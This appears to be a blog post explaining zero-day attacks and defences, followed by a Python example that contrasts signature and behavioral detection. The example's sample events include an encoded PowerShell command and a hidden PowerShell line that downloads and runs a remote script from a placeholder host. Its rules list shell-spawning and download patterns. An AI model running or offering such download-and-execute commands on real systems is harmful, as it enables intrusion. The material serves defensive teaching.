Well everybody, Happy 4th of July!!! Hopefully the second half of the year goes
better than the first one did!!! Looking back
at the last six months, the Cyber Threat Landscape really does not look much
different from 2021.
There are the usual Ransomware and Phishing attacks, but
nothing has caught my eye that I remember.
Sure, there was the fear of escalated attacks from Russia as it invaded
Ukraine, but nothing disastrous has happened (at least not yet).
But there is one variant that all IT Security teams need to
be on the lookout for, and these are technically known as “Zero Day
Attacks”. What is it, you may be asking? A technical definition is as follows:
“[It] is a cyber-attack targeting a software vulnerability
which is unknown to the software vendor or to antivirus vendors. The attacker
spots the software vulnerability before any parties interested in mitigating
it, quickly creates an exploit, and uses it for an attack. Such attacks are
highly likely to succeed because defenses are not in place. This makes zero-day
attacks a severe security threat.”
(SOURCE: https://www.imperva.com/learn/application-security/zero-day-exploit/).
Basically put, it is a weakness or gap in a software
application that even the maker of the software product does not
know about. It only becomes known when somebody outside the vendor, either a
security researcher or a Cyberattacker, examines the software on their own and
finds the flaw. Note that this is not a backdoor (which somebody deliberately
builds in); it is an unintended bug that happens to be exploitable. Once a
Cyberattacker discovers it, they write an exploit for it and try to penetrate as
quickly as possible, before anybody else finds it and the vendor ships a fix.
From there, they can stay in for as long as they want, because
nobody else knows about the gap and there is no patch and no signature for it.
Once the Cyberattacker has decided
where they will deliver the malicious payload, they drop it, and get away as
far as they can in order to cover their tracks (but even the shrewdest of
Cyberattackers will always leave some evidence behind).
So now you can tell why it is called a Zero Day attack: the software
vendor has had zero days to fix the flaw by the time it is being exploited, so
there is no patch, no detection signature, and no telltale warning that something
is about to happen. In a way, this is probably about the worst
form of Cyberattack, because everybody is caught off guard, and the end result
can be nearly disastrous, even bringing the business to its knees.
But believe it or not, Zero Day Attacks are nothing new.
They have been around for over twenty years, but the difference between
then and now is that given the digital world we live in, news about them
spreads like wildfire. Even the largest
of the tech giants such as Google and Microsoft keep track of these (Google's
Project Zero team, for example, publishes a running list of Zero Days that have
been exploited in the wild), given the amount of threat intelligence they now
have access to.
There was a huge rise in these kinds of threat vectors just
last year, and they are expected to keep growing. Some of these attacks are extremely sophisticated,
like the SolarWinds hack, which is often grouped with Zero Days even though it was
primarily a software supply chain attack: the Cyberattacker compromised an external
third party's build process, so a trojanized update of a legitimate product reached
thousands of end users at once.
Or they can be lower level ones, such as a flaw in everyday
software like Word, Excel, or even PowerPoint, delivered through a booby-trapped
document (these have been among the favorite targets for Cyberattackers).
Given how covert these Zero Day Attacks can be, what can you
do to protect your business? Here are
some key steps:
*Try to use antimalware/antivirus software that does
behavioral or so-called AI based detection. The
reason I say this is that these newer products look for patterns of unusual
behavior (for example, a Word document spawning a command shell) and alert you
that way, even when the payload itself has never been seen before. Older
versions simply compared files against the known attack signatures in their
database. While that can be an effective way
of doing things, keep in mind that a signature only exists once somebody has already
seen the malware, which by definition is not the case for a Zero Day, and that the
antivirus/antimalware vendor has to update
these databases. Usually that is not done on
a real time basis; it is done in batches, leaving the window of
vulnerability open even longer.
*Keep up to date with all of your software patches and
upgrades. Yes, you keep hearing this all
of the time, but it still remains one of the best ways to fend off any threat variants.
Once a vendor does release a fix for a Zero Day, the clock is running: the flaw is
now public, and the Cyberattackers who did not know about it before will start using
it too. It's a pain, I know, but it will be well worth it in the end.
*Keep up with the latest Cyber threat bulletins that are
made to the public. Some of the leading
sources for this include CISA (which also maintains a catalog of vulnerabilities
known to be exploited in the wild) and the FBI.
Always look over these bulletins carefully, and double check that your
IT/Network Infrastructure is not vulnerable to them.
*Expand your IT Security team. Yeah, I know, this is a broken record, just
like keeping track of software patches and upgrades. But now is the time to hire and expand your base,
with real humans!!! Remember, technology
can only go so far; you also need the human element in there as well. Who cares if you hire somebody who is not
experienced enough? Train them the best way you can. There is no substitute for on-the-job
training, and learning while the real thing is happening.
*One of the few ways to find unknown vulnerabilities in your own environment is to
actually conduct a deep dive Penetration Test. But depending upon how exhaustive you want
it to be, a Pen Test is a snapshot of one point in time, and they are
expensive. For example, the average Pen
Test costs on the order of $20k-$30k. Just imagine
if you had to do that 4x a year. That
would really eat up your bottom line.
But the good news is that there are new Pen Test tools coming
out on the marketplace, which let you run them automatically and
autonomously on a continuous basis. The
bottom line here is that you pay a yearly license fee, and you can run as many
Pen Tests as you need to without any extra costs incurred. One caveat: these tools
exercise known attack techniques against your systems, so they will not discover a
brand new Zero Day for you, but they will tell you quickly whether a newly published
one works against your environment.
My Thoughts On This:
Another good way to detect the unknown is to have a Bug
Bounty program. This is where you invite
hackers of all sorts to literally break into your system and find the
unknown vulnerabilities. In return, you
pay that individual or group a handsome cash prize. But be careful about who participates in this,
as you do not want a Cyberattacker from a nation state taking part; define the scope
clearly, and consider running it through a managed platform that vets the researchers.
Finally, as mentioned earlier, always be on the lookout for
any anomalies. Don't just look for known
attack signatures. Any unusual behavior
means that something is happening in real time, and that for sure merits your attention
if you want to stop a Zero Day attack before it does its damage.
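To make the signature-versus-behavior point above concrete, here is an added example (not code from the original post, and not any vendor's product) that runs both kinds of check over a handful of constructed process-creation events, the sort of data an endpoint agent or Sysmon would log. The hashes, command lines, rule set and host name (example.invalid) are all made up for illustration. The signature check only fires on a payload whose hash is already in the "known bad" list; the behavioral check fires on an Office application (Word, Excel, PowerPoint) spawning a shell or script host, and on suspicious command line patterns, regardless of whether the payload has ever been seen before.

```python
"""Signature matching versus behavioral detection over process-creation events.

Constructed example for illustration: the events, hashes, rules and host name
below are made up and do not come from any real incident or product.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed "known bad" database, as a signature engine would hold it.
KNOWN_BAD_SHA256: Dict[str, str] = {
    hashlib.sha256(b"old-well-known-dropper").hexdigest(): "Dropper.Known.A",
}

# Parent/child pairs that are rarely legitimate: an Office app launching a shell
# or script host is a classic sign of a booby-trapped document, whatever the
# payload hash happens to be.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "msdt.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the new process
    cmdline: str   # full command line of the new process
    sha256: str    # hash of the new process's executable


def signature_check(ev: ProcessEvent) -> Optional[str]:
    """Classic antivirus logic: hit only if the exact hash is already known."""
    return KNOWN_BAD_SHA256.get(ev.sha256)


def behavior_check(ev: ProcessEvent) -> List[str]:
    """Behavioral logic: flag what the process *does*, not what it is."""
    findings: List[str] = []
    if ev.parent.lower() in OFFICE_APPS and ev.image.lower() in SUSPICIOUS_CHILDREN:
        findings.append(f"office app {ev.parent} spawned {ev.image}")
    low = ev.cmdline.lower()
    if " -enc" in low or "frombase64string" in low:
        findings.append("encoded PowerShell command line")
    if "downloadstring" in low or "invoke-webrequest" in low:
        findings.append("script downloads remote content")
    return findings


def triage(events: List[ProcessEvent]) -> List[Dict[str, object]]:
    """Run both checks on each event and give a verdict per event."""
    results = []
    for ev in events:
        sig = signature_check(ev)
        beh = behavior_check(ev)
        if sig:
            verdict = "known-malware"
        elif beh:
            verdict = "suspicious"
        else:
            verdict = "clean"
        results.append({"image": ev.image, "signature": sig,
                        "behavior": beh, "verdict": verdict})
    return results


# Constructed sample events. Event 1 is a never-before-seen payload launched
# from Word: the signature check misses it, the behavioral check does not.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "winword.exe", "winword.exe quarterly.docx",
                 hashlib.sha256(b"constructed-legit-word").hexdigest()),
    ProcessEvent("winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi",
                 hashlib.sha256(b"constructed-unseen-payload").hexdigest()),
    ProcessEvent("explorer.exe", "invoice_viewer.exe", "invoice_viewer.exe",
                 hashlib.sha256(b"old-well-known-dropper").hexdigest()),
    ProcessEvent("excel.exe", "cmd.exe",
                 "cmd.exe /c powershell -w hidden IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/a.ps1')",
                 hashlib.sha256(b"constructed-legit-cmd").hexdigest()),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"{r['image']:<20} {r['verdict']:<14} sig={r['signature']} beh={r['behavior']}")
```

The second event is the Zero Day case: its hash is not in any database, so the signature engine stays silent, but Word spawning an encoded PowerShell command is anomalous on its own and gets flagged. In a real deployment the rule set would be far larger and tuned against your own baseline of normal parent/child pairs, but the principle is the same as in the bullet on behavior based antimalware above.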